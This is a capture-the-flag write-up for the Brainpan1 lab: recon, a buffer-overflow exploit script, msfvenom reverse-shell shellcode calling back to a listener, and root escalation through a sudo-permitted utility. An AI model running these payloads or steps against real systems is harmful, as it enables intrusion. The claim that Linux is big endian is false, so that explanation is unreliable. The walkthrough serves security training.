Brainpan1 - Buffer Overflow
Recon
Let’s get started with the nmap scan.
1# nmap -Pn -A -T4 -oN brainpan1.nmap.txt 10.10.20.69
2Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
3Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-01 16:24 EST
4Nmap scan report for 10.10.20.69
5Host is up (0.079s latency).
6Not shown: 998 closed ports
7PORT STATE SERVICE VERSION
89999/tcp open abyss?
9| fingerprint-strings:
10| NULL:
11| _| _|
12| _|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_|
13| _|_| _| _| _| _| _| _| _| _| _| _| _|
14| _|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _|
15| [________________________ WELCOME TO BRAINPAN _________________________]
16|_ ENTER THE PASSWORD
1710000/tcp open http SimpleHTTPServer 0.6 (Python 2.7.3)
18|_http-server-header: SimpleHTTP/0.6 Python/2.7.3
191 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
20SF-Port9999-TCP:V=7.91%I=7%D=12/1%Time=5FC6B4AF%P=x86_64-pc-linux-gnu%r(NU
21SF:LL,298,"_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
22SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20
23SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
24SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
25SF:20\n_\|_\|_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|\x20\x20\x20\x20_\|_\|_\|
26SF:\x20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20\
27SF:x20\x20\x20_\|_\|_\|\x20\x20_\|_\|_\|\x20\x20\n_\|\x20\x20\x20\x20_\|\x
28SF:20\x20_\|_\|\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x
29SF:20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x
30SF:20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|\x20\x20\x20\x20_\|
31SF:\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\x
32SF:20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x
33SF:20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|_\|_\|\x20\x
34SF:20\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20_
35SF:\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|_\|\x20\x20\x20\x20\x20\x
36SF:20_\|_\|_\|\x20\x20_\|\x20\x20\x20\x20_\|\n\x20\x20\x20\x20\x20\x20\x20
37SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
38SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
39SF:20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
40SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\x20\x20\x20\x20\x20\x2
41SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
42SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
43SF:x20\x20_\|\n\n\[________________________\x20WELCOME\x20TO\x20BRAINPAN\x
44SF:20_________________________\]\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
45SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20ENTER\x
46SF:20THE\x20PASSWORD\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
47SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\n\
48SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
49SF:\x20\x20\x20\x20\x20\x20\x20\x20>>\x20");
50No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
51TCP/IP fingerprint:
52OS:SCAN(V=7.91%E=4%D=12/1%OT=9999%CT=1%CU=39102%PV=Y%DS=4%DC=T%G=Y%TM=5FC6B
53OS:4EE%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=10A%TI=Z%CI=Z%II=I%TS=8)O
54OS:PS(O1=M506ST11NW7%O2=M506ST11NW7%O3=M506NNT11NW7%O4=M506ST11NW7%O5=M506S
55OS:T11NW7%O6=M506ST11)WIN(W1=45EA%W2=45EA%W3=45EA%W4=45EA%W5=45EA%W6=45EA)E
56OS:CN(R=Y%DF=Y%T=40%W=4602%O=M506NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F
57OS:=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5
58OS:(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z
59OS:%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=
60OS:N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%
61OS:CD=S)
62
63Network Distance: 4 hops
64
Some important observations -
- There is a service running on 9999, we can try to connect and interact with it.
- Also, there is a HTTP service running on port 10000. We can fire up dirb or gobuster to scan for any exposed directories behind the home page.
1# nc 10.10.20.69 9999
2_| _|
3_|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_|
4_| _| _|_| _| _| _| _| _| _| _| _| _| _| _|
5_| _| _| _| _| _| _| _| _| _| _| _| _| _|
6_|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _|
7 _|
8 _|
9
10[________________________ WELCOME TO BRAINPAN _________________________]
11 ENTER THE PASSWORD
12
13 >> aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
14 ACCESS DENIED
15
16
Looks like this service accepts a password string. I was able to crash the service after sending a really long string and it took the service to come back online after about 5 minutes.
Gobuster Scan :
1$ sudo gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --url=http://10.10.20.69:10000
2[sudo] password for eneloop:
3===============================================================
4Gobuster v3.0.1
5by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
6===============================================================
7[+] Url: http://10.10.20.69:10000
8[+] Threads: 10
9[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
10[+] Status codes: 200,204,301,302,307,401,403
11[+] User Agent: gobuster/3.0.1
12[+] Timeout: 10s
13===============================================================
142020/12/01 18:29:33 Starting gobuster
15===============================================================
16/bin (Status: 301)
17Progress: 30709 / 220561 (13.92%)
18
While the scan was running, the intial irectory scan results will reveal the /bin directory and inside this directory there is brainpan.exe. Lets download this file for examination.
1# wget http://10.10.20.69:10000/bin/brainpan.exe
2--2020-12-01 18:36:13-- http://10.10.20.69:10000/bin/brainpan.exe
3Connecting to 10.10.20.69:10000... connected.
4HTTP request sent, awaiting response... 200 OK
5Length: 21190 (21K) [application/x-msdos-program]
6Saving to: ‘brainpan.exe’
7
8brainpan.exe 100%[==============================================>] 20.69K --.-KB/s in 0.08s
9
102020-12-01 18:36:13 (274 KB/s) - ‘brainpan.exe’ saved [21190/21190]
11
Enumeration
Copy the exe to a windows machine where we can develop the exploit. Launch immunity debugger as administrator and open the brainpan.exe and start the application. Please note that everytime you crash the application during the exploit development stage, you will have to restart the debugger and run the application.
Lets try to send incrementing bytes and find rough estimate around which the buffer overflow is triggered.
1# python ./fuzzer.py
2Sending 100 bytes
3Sending 200 bytes
4Sending 300 bytes
5Sending 400 bytes
6Sending 500 bytes
7Sending 600 bytes
8Could not connect to 10.0.0.11:9999
9
Now, the stack has overflown and the EIP register was over written by 41414141 (AAAA), we can generate a cyclic pattern of 600 + 400 extra = 1000 bytes and that will help us identify the EIP offset.
1# msf-pattern_create -l 1000
2Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B
3
Now, lets send this payload using a script similar to the one below -
1import socket
2
3ip = "10.0.0.11"
4port = 9999
5prefix = ""
6offset = 0
7overflow = "A" * offset
8retn = ""
9padding = ""
10payload = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B"
11postfix = ""
12
13buffer = prefix + overflow + retn + padding + payload + postfix
14
15s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
16
17try:
18 s.connect((ip, port))
19 print("Sending buffer...")
20 s.send(buffer + "\r\n")
21 print("Done!")
22except:
23 print("Could not connect.")
24
This should crash the program again and the EIP will be filled with bytes from the cyclic pattern. We can locate this pattern to count the offset and that will allow us to control the EIP.
The EIP offset is at 524.
1# msf-pattern_offset -q 35724134
2[*] Exact match at offset 524
Lets validate that by overwriting EIP register with BBBB (42’s) by specifying that as a return address. Now, restart immunity and kick off the script above with BBBB as the return address.
Nice! This proves we are on a right track so far. Now, lets identify if there are any bad characters that we should avoid when building the exploit.
Exploit
Now, we are ready for developing the exploit as there are no bad characters. Using mona, identify the JMP addresses we can use. In this case, there is only one usable pointer.
I ran another nmap scan with -O option and determined that the OS of brainpan was linux, which uses big endian format so we will use the return address as we see it.
Now, generate the exploit using a command similar to below -
1msfvenom -p windows/shell_reverse_tcp LHOST=<YOUR IP> LPORT=4444 EXITFUNC=thread -b "\x00" -f py
Now, start a listener locally on port 4444, restart the immunity debugger and make sure to run the application. When you run the exploit, you should have the shell.
1$ nc -lvnp 4444
2listening on [any] 4444 ...
3connect to [10.0.0.8] from (UNKNOWN) [10.0.0.11] 49718
4Microsoft Windows [Version 10.0.19042.630]
5(c) 2020 Microsoft Corporation. All rights reserved.
6
Please note that the return address is in reverse as we developed on a Windows machine which is a little endian format. When you generate and run the exploit against the real machine, please update the address.
Post-Exploitation/Privesc
Before I realized it was a linux machine running a windows using a WINE emulator, I found myself inside the wine environment as I used the windows reverse shell exploit.
1Z:\home\puck>dir
2Volume in drive Z has no label.
3Volume Serial Number is 0000-0000
4
5Directory of Z:\home\puck
6
7 3/6/2013 2:23 PM <DIR> .
8 3/4/2013 10:49 AM <DIR> ..
9 3/6/2013 2:23 PM 513 checksrv.sh
10 3/4/2013 1:45 PM <DIR> web
11 1 file 513 bytes
12 3 directories 13,823,844,352 bytes free
13
14
15Z:\home\puck>type checksrv.sh
16#!/bin/bash
17# run brainpan.exe if it stops
18lsof -i:9999
19if [[ $? -eq 1 ]]; then
20 pid=`ps aux | grep brainpan.exe | grep -v grep`
21 if [[ ! -z $pid ]]; then
22 kill -9 $pid
23 killall wineserver
24 killall winedevice.exe
25 fi
26 /usr/bin/wine /home/puck/web/bin/brainpan.exe &
27fi
28
29# run SimpleHTTPServer if it stops
30lsof -i:10000
31if [[ $? -eq 1 ]]; then
32 pid=`ps aux | grep SimpleHTTPServer | grep -v grep`
33 if [[ ! -z $pid ]]; then
34 kill -9 $pid
35 fi
36 cd /home/puck/web
37 /usr/bin/python -m SimpleHTTPServer 10000
38fi
39
Here is the next attempt with the correct shell -
1# msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.6.19.215 LPORT=4444 EXITFUNC=thread -b "\x00" -f py
2[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
3[-] No arch selected, selecting arch: x86 from the payload
4Found 11 compatible encoders
5Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
6x86/shikata_ga_nai succeeded with size 95 (iteration=0)
7x86/shikata_ga_nai chosen with final size 95
8Payload size: 95 bytes
9Final size of py file: 479 bytes
10buf = b""
11buf += b"\xda\xda\xba\x1d\xa5\x08\x22\xd9\x74\x24\xf4\x5e\x29"
12buf += b"\xc9\xb1\x12\x31\x56\x17\x83\xee\xfc\x03\x4b\xb6\xea"
13buf += b"\xd7\x42\x63\x1d\xf4\xf7\xd0\xb1\x91\xf5\x5f\xd4\xd6"
14buf += b"\x9f\x92\x97\x84\x06\x9d\xa7\x67\x38\x94\xae\x8e\x50"
15buf += b"\x2d\x57\x62\x77\x59\x55\x84\x66\xc6\xd0\x65\x38\x90"
16buf += b"\xb2\x34\x6b\xee\x30\x3e\x6a\xdd\xb7\x12\x04\xb0\x98"
17buf += b"\xe1\xbc\x24\xc8\x2a\x5e\xdc\x9f\xd6\xcc\x4d\x29\xf9"
18buf += b"\x40\x7a\xe4\x7a"
19
Jailbreak to the shell using python -
1$ nc -lvnp 4444
2listening on [any] 4444 ...
3connect to [10.6.19.215] from (UNKNOWN) [10.10.151.71] 54169
4ls
5checksrv.sh
6web
7python -c 'import pty;pty.spawn("/bin/bash")';
8puck@brainpan:/home/puck$
9puck@brainpan:/home$ id
10id
11uid=1002(puck) gid=1002(puck) groups=1002(puck)
12puck@brainpan:/home$ sudo -l
13sudo -l
14Matching Defaults entries for puck on this host:
15 env_reset, mail_badpass,
16 secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
17
18User puck may run the following commands on this host:
19 (root) NOPASSWD: /home/anansi/bin/anansi_util
20puck@brainpan:/home$
21
22
Then downloaded the linPEAs anyway and ran the scan to identify some interesting info as shown below -
1root 810 0.0 0.0 2620 800 ? Ss 17:26 0:00 cron
2root 892 0.0 0.0 3180 1144 ? S 17:27 0:00 \_ CRON
3puck 893 0.0 0.0 2232 540 ? Ss 17:27 0:00 \_ /bin/sh -c /home/puck/checksrv.sh
4puck 894 0.0 0.0 5176 1288 ? S 17:27 0:00 \_ /bin/bash cd
5puck 906 0.9 0.2 12396 6152 ? S 17:27 1:02 \_ /usr/bin/python -m SimpleHTTPServer 10000
6
7
8[+] Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
9[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
10Matching Defaults entries for puck on this host:
11 env_reset, mail_badpass,
12 secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
13
14User puck may run the following commands on this host:
15 (root) NOPASSWD: /home/anansi/bin/anansi_util
16
17
18[+] Searching uncommon passwd files (splunk)
19backup-manager file: /etc/cron.daily/passwd
20backup-manager file: /etc/init.d/passwd
21backup-manager file: /etc/pam.d/passwd
22backup-manager file: /usr/share/bash-completion/completions/passwd
23backup-manager file: /usr/share/lintian/overrides/passwd
After playing with /home/anansi/bin/anansi_util for a while I was able to break in as root -
1puck@brainpan:/home$ sudo /home/anansi/bin/anansi_util manual bash -i
2sudo /home/anansi/bin/anansi_util manual bash -i
3No manual entry for manual
4uid=0(root) gid=0(root) groups=0(root)
5!done (press RETURN)
6
BrainPan is done!